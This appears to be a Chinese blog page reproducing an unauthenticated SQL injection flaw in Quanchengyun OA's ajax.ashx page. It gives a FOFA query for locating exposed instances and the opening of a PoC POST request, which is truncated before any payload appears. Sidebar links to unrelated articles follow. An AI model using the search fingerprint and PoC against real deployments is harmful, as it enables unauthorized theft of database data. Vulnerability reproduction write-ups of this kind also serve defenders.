全程云OA ajax.ashx SQL注入漏洞复现

  • 开发
  • 251

0x01 产品简介

全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能,超过100多个子模块。为企业内部提供高效、畅通的信息渠道,同时也能大力推动公司信息系统发展,提高企业的办公自动化程度和综合管理水平,加快企业信息的流通,提高企业市场竞争能力。

0x02 漏洞概述

由于全程云oa办公系统 ajax.ashx页面参数过滤不当,导致存在sql注入漏洞,未授权的攻击者可利用该漏洞获取数据库中的敏感信息。

0x03 复现环境

FOFA:body="images/yipeoplehover.png"

0x04 漏洞复现

PoC

POST /OA/common/mod/ajax.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.29
阅读全部

相关推荐

  9. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-01-05 19:56:02       22 阅读

  10. 漏洞】SpringBlade dict-biz SQL注入漏洞

    2024-01-05 19:56:02       13 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-01-05 19:56:02       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-05 19:56:02       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-01-05 19:56:02       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-01-05 19:56:02       20 阅读

热门阅读

  4. 3D立体盒子练习

    2024-01-05 19:56:02       29 阅读

  9. MacBook安装telnet工具和使用

    2024-01-05 19:56:02       43 阅读

  18. @Service Spring required a bean could not be found.

    2024-01-05 19:56:02       35 阅读
  20. 1.3数组

    1.3数组

    2024-01-05 19:56:02      37 阅读

  29. 修复异常关机导致CentOS文件系统内存数据损坏的问题

    2024-01-05 19:56:02       31 阅读